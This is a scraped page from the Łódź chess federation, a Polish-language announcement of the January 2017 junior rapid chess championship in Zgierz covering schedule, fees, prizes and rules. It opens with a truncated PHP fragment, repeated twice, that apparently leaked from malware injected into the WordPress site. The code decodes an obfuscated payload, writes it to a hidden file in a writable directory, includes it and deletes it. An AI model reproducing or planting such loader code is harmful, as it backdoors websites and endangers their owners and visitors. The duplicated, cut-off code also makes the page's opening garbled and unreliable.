100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Komunikat Mistrzostw Województwa Łódzkiego Juniorów w Szachach Szybkich | Łódzki Związek Szachowy Skip to main content
image003

Komunikat Mistrzostw Województwa Łódzkiego Juniorów w Szachach Szybkich

Mistrzostwa Województwa Łódzkiego Juniorów w Szachach Szybkich

Stacja Nowa Gdynia 07.01.2017 r.

Cel:

 • Wyłonienie Mistrzów Województwa Łódzkiego w kategorii juniorów i młodzików
 • Popularyzacja szachów w województwie łódzkim
 • Podnoszenie umiejętności gry i zdobycie doświadczenia turniejowego

Organizator:      

 • Łódzki Związek Szachowy
 • Stacja Nowa Gdynia

Termin:     

 • 07.01.2017 r.

Miejsce gry:       

 • Stacja Nowa Gdynia Zgierz, ul. Sosnowa 1

System gry:

 • 9 rund
 • kojarzenie komputerowe systemem szwajcarskim
 • Mistrzostwa Województwa są zgłoszone do oceny rankingowej FIDE dla szachów szybkich.
 • zawody rozgrywane będą w dwóch grupach:
 • Dzieci w wieku do lat 10 (rocznik 2007 i młodsi)
 • Dzieci i młodzież w wieku 11-18 lat (rocznik 2006-1999)

Tempo gry:

 • 10 minut + 5 sekund na wykonanie każdego posunięcia od początku partii

Zgłoszenia:        

Wpisowe:

 • 30 zł płatne do dnia 05.01.2017 r. przelewem na konto Łódzkiego Związku Szachowego 07 1020 3352 0000 1102 0119 4950 w tytule podając nazwę zawodów oraz imię i nazwisko zawodnika
 • Wpisowe w całości przeznaczone na nagrody.

Nagrody:           

 • Puchary, medale, nagrody rzeczowe
 • Nagrody rozdawane będą w 6 grupach wiekowych:
 1. dzieci w wieku do 8 lat
 2. dzieci w wieku 9-10 lat
 3. dzieci w wieku 11-12 lat
 4. dzieci w wieku 13-14 lat
 5. dzieci w wieku 15-16 lat
 6. dzieci w wieku 17-18 lat

Harmonogram:

Weryfikacja zgłoszeń 800 – 945
I runda 1000
Zakończenie 1530

 

Inne:

 • Zawodnicy przybyli po weryfikacji zostaną dopuszczeni do gry od II rundy
 • W turnieju obowiązują przepisy gry FIDE dotyczące szachów szybkich
 • Zawodnicy ubezpieczają się we własnym zakresie
 • Opiekę nad dziećmi w trakcie turnieju sprawują rodzice lub opiekunowie
 • Ostateczna interpretacja komunikatu należy do organizatora.
 • Dyrektor zawodów – Sylwester Bednarek  tel.: 693-654-987

 

Serdecznie zapraszamy!

Komunikat – wersja do pobrania

Dodaj komentarz